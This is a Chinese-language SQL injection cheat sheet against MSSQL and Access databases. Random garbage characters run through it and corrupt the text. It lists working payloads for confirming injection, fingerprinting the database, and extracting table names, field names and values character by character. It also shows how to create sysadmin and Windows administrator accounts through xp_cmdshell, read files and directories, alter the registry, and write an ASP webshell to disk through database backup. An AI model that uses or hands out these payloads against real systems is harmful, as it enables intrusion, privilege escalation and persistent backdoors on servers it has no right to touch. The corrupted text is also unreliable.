1.判断是否有注入;and 1=1 ;and 1=2 �x{�R440"�
2.初步判断是否是mssql ;and user>0 !�#0)`4O��
rL���5=�8l
3.注入参数是字符'and [查询条件] and ''=' pCKP{c=�6Q
OUulG�16kK
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �@ �m`C%7<
7@c!4hmr�U
5.判断数据库系统 iYXD }l�;r
Nc+0_�|�,�
;and (select count(*) from sysobjects)>0 mssql ��MzvhE0ab
C*Q�7�@+&�
;and (select count(*) from msysobjects)>0 access Yml�j�HQP�
5IU!�BQ�U�
�)LP'��4�*
���j^�jC|
6.猜数据库 ;and (select Count(*) from [数据库名])>0 do"� �m�=y
O=Su
�E/�q
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 5�EtR�>�Pc
�J^+w]2`�S
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �Z �%�pc�"
N�O�5k1�/-
9.(1)猜字段的ascii值(access) `EKf�1U\FI
�dgV�G�P_~
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 $yO���B�-
�k^7!i�OK2
(2)猜字段的ascii值(mssql) �-ssb�|��r
Fy�vo;1�a
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 +yL;?+s>=
2B�t/co-~4
10.测试权限结构(mssql) �JA^!i9�8{
<)d%�c%f'`
�S�9dx�rm?
hj]�;a,Br&
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �{\>4�)TA�
&�N.pW=%,N
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �9�~V'We�v
bd��/A0i?C
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �)WvKRp �r
NDR�D�P�D
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- di9OQ*6�a7
0n�B[U�dk?
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 1ZYo-a�;)�
@)[8m8paV�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �"�XLtrAu{
W$`v^�1M2o
;and 1=(select IS_MEMBER('db_owner'));-- Z(6.e8fK
90���}vFoy
@!"�)�shc
�~Y�d[&vpQ
11.添加mssql和系统的帐户 +zM���hA p
)L��9eL�xI
;exec master.dbo.sp_addlogin username;-- 1�TTS��@\�
;exec master.dbo.sp_password null,username,password;-- �e^eJ!~��0
-
2L(])t6
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- q.���=�Q�
#�[M�^Q
�h
;exec master.dbo.xp_cmdshell 'net user username password ���G06;x �
=��7+�%3�1
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- :Ob�4�WU��
�qR�
�c�SB
;exec master.dbo.xp_cmdshell 'net user username password /add';-- %q|��*�}�l
G@�DNV3Cc
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ��s�;b��Gg
.�e��Is��$
b<y�*��:(:
>�Y4^<!\�v
12.(1)遍历目录 fh`Y2s|:7R
/UunW�Z u%
;create table dirs(paths varchar(100), id int) ]@9W19=P!P
�T2rw�K2��
;insert dirs exec master.dbo.xp_dirtree 'c:\' �U=���JK��
�W�IL�a8"M
;and (select top 1 paths from dirs)>0 0E#??��gN�
kKF=%J�?X�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) |[n\'Xy;{�
�!y_L�~81?
LI��G�@�`
!7\�dr )��
(2)遍历目录 ?:/�J8s
[O
e*'bY;8lo�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �G h+;Vrx
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 XwEM�F�5�[
�&c-V
QP�(
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 eH��Uy�V@
1.p�?1"4\u
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 t'Yd+FK
��
B��>�E4,"
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 @{�qcu\sZ�
$���xW�9))
G0:�<#?<�5
�])y�)]H#{
13.mssql中的存储过程 qDG��x��(d
gAvNm[=wD2
xp_regenumvalues 注册表根键, 子键 ;PMPXN'z6
�@8J*vY =e
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �dKP�Xs-5
a?Fz&�BE�
xp_regread 根键,子键,键值名 O~�8jz��
)X�#$G?|Hn
;exec xp_regread Z-t qSw8n
Kc]
GE#~g�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 J�qL�PJUr�
_Rj��bm'kC
xp_regwrite 根键,子键, 值名, 值类型, 值 >�H�euf"V
8�5"Sz�c-#
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �Sg�QmR�#5
/���tkV�/�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �S8;�c0}�-
g�[b�;�1$�
xp_regdeletevalue 根键,子键,值名 De$�Ic"Z9L
3J4O��kwqD
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 D'g@B.fXd
;YokP�iB�y
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ^,'�KmZm�=
�G�|�&$/]~
}5"�Rj<��
}rVLW�t���
14.mssql的backup创建webshell �Y]&�2E/oc
3 P\�4�K
use model p*$=Eo�m�Y
\Sm�YxdU'>
create table cmd(str image); Ei,��dO;�&
aQWg?�,Ju6
insert into cmd(str) values (''); yYJ +�v�s
0�^P9)<k'
backup database model to disk='c:\l.asp'; ?)qm=mebY
>0�N$R|�B&
z2�.OR,R}]
NCkrf]*�F-
15.mssql内置函数 q�/7T-"q/G
s?sr�0H��Z
;and (select @@version)>0 获得Windows的版本号 {R~L7uR�@O
eZpi+BR�S6
;and user_name()='dbo' 判断当前系统的连接用户是不是sa )1 0�aDTlr
$KRpu<5i}
;and (select user_name())>0 爆当前系统的连接用户 =6'D�/| �3
j�fR!�M07|
;and (select db_name())>0 得到当前连接的数据库 �gU@�.I�Og
jA3�Ir;a��
��vO;�:��~
KH$o X�\v
16.简洁的webshell SsL>�K*�t5
DQ6p�e)E|�
use model G�n��qun�%
y9GaxW*�&
create table cmd(str image); #��Nv0d|0\
Ga"�<qmLMc
insert into cmd(str) values (''); I�rP�6�Rxh
Z�+;�6�70Z
backup database model to disk='g:\wwwtest\l.asp';
